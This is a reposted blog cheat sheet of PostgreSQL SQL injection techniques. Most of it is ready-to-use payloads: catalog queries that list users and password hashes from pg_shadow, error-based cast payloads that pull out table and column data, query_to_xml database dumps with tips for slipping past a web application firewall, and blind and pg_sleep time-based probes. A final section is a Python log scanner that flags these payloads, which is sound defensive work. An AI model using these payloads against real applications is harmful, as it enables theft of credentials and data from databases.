
A Complete Guide to PostgreSQL SQL Injection Methods


0x00 Sqli

1. Comments

--
/**/

2. Query the version

SELECT version()

3. Query the current user

SELECT user;
SELECT current_user;
SELECT session_user;
SELECT usename FROM pg_user;
SELECT getpgusername();

4. List users

SELECT usename FROM pg_user

5. List user password hashes

SELECT usename, passwd FROM pg_shadow

6. List database superuser accounts

SELECT usename FROM pg_user WHERE usesuper IS TRUE

7. List privileges

SELECT usename, usecreatedb, usesuper, usecatupd FROM pg_user

8. Current database name

SELECT current_database()

9. List databases

SELECT datname FROM pg_database

10. List table names

SELECT table_name FROM information_schema.tables

11. List column names

SELECT column_name FROM information_schema.columns WHERE table_name='data_table'

12. Error-based injection

,cAsT(chr(126)||vErSiOn()||chr(126)+aS+nUmeRiC)
,cAsT(chr(126)||(sEleCt+table_name+fRoM+information_schema.tables+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)--
,cAsT(chr(126)||(sEleCt+column_name+fRoM+information_schema.columns+wHerE+table_name='data_table'+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)--
,cAsT(chr(126)||(sEleCt+data_column+fRoM+data_table+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)

' and 1=cast((SELECT concat('DATABASE: ',current_database())) as int) and '1'='1
' and 1=cast((SELECT table_name FROM information_schema.tables LIMIT 1 OFFSET data_offset) as int) and '1'='1
' and 1=cast((SELECT column_name FROM information_schema.columns WHERE table_name='data_table' LIMIT 1 OFFSET data_offset) as int) and '1'='1
' and 1=cast((SELECT data_column FROM data_table LIMIT 1 OFFSET data_offset) as int) and '1'='1

13. XML helpers

select query_to_xml('select * from pg_user',true,true,''); -- returns every row of the result in one value, so it is usable inside error-based injection; the query argument only needs to be a string, so it can be assembled by concatenation and similar tricks to get past a WAF
select database_to_xml(true,true,''); -- dump the current database to XML
select database_to_xmlschema(true,true,''); -- dump the current db to an XML schema

14. Blind injection

' and substr(version(),1,10) = 'PostgreSQL' and '1 -> OK
' and substr(version(),1,10) = 'PostgreXXX' and '1 -> KO

15. Time-based injection

AND [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME]))
AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))
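From the defender's side, the error-based, XML-helper and time-based payloads above share a few stable markers (CAST ... AS NUMERIC/INT wrapped around a subquery, pg_user / pg_shadow / information_schema lookups, query_to_xml, pg_sleep, generate_series) that survive the mixed-case and "+"-encoded spacing used in the samples once the request is normalised. The following is an added example, not part of the original post: it decodes constructed web-server log lines (the log format and client IPs are assumed) and reports which of the listed techniques each client used.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (not from the original page), in an
# assumed "<client-ip> <path?query>" format; the payloads mirror the cheat sheet.
SAMPLE_LOG = """\
10.0.0.5 /item?id=1
10.0.0.7 /item?id=1,cAsT(chr(126)||vErSiOn()||chr(126)+aS+nUmeRiC)
10.0.0.7 /item?id=1'+and+1=cast((SELECT+table_name+FROM+information_schema.tables+LIMIT+1+OFFSET+0)+as+int)+and+'1'='1
10.0.0.9 /item?id=1+AND+1234=(SELECT+1234+FROM+PG_SLEEP(5))
10.0.0.9 /item?id=1;select+query_to_xml('select+*+from+pg_user',true,true,'')
10.0.0.5 /search?q=postgresql+cast+tutorial
"""

# Indicators for the techniques listed above, matched after normalisation so
# case tricks such as cAsT and "+"-encoded spaces do not hide them.
SIGNATURES = {
    "error-based cast": re.compile(r"cast\s*\(.*\bas\s+(numeric|int)\b"),
    "catalog enumeration": re.compile(r"\b(pg_user|pg_shadow|information_schema\.\w+)\b"),
    "xml helper": re.compile(r"\b(query_to_xml|database_to_xml|database_to_xmlschema)\s*\("),
    "time-based": re.compile(r"\b(pg_sleep|generate_series)\s*\("),
    "version probe": re.compile(r"\bversion\s*\(\s*\)"),
}

def normalise(query_string):
    """Decode percent-encoding and '+' spaces, lower-case, collapse whitespace."""
    decoded = unquote_plus(query_string)
    return re.sub(r"\s+", " ", decoded).lower()

def classify_line(line):
    """Return (client_ip, [matched signature names]) for one log line."""
    ip, _, request = line.partition(" ")
    _, _, query = request.partition("?")
    text = normalise(query)
    hits = [name for name, rx in SIGNATURES.items() if rx.search(text)]
    return ip, hits

def scan_log(log_text):
    """Map each client IP to the set of injection techniques seen from it."""
    report = {}
    for line in log_text.splitlines():
        ip, hits = classify_line(line)
        if hits:
            report.setdefault(ip, set()).update(hits)
    return report

if __name__ == "__main__":
    for ip, techniques in scan_log(SAMPLE_LOG).items():
        print(ip, sorted(techniques))
```

The plain search for "postgresql cast tutorial" produces no hit, since the cast signature requires the function-call form around a subquery; a production rule set would go further and alert on any `pg_sleep` or `query_to_xml` reaching the database layer at all.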

This article is reposted from Evi1cg's blog and does not represent the position of 极安网. Please credit the source when reposting: https://secvery.com/3131.html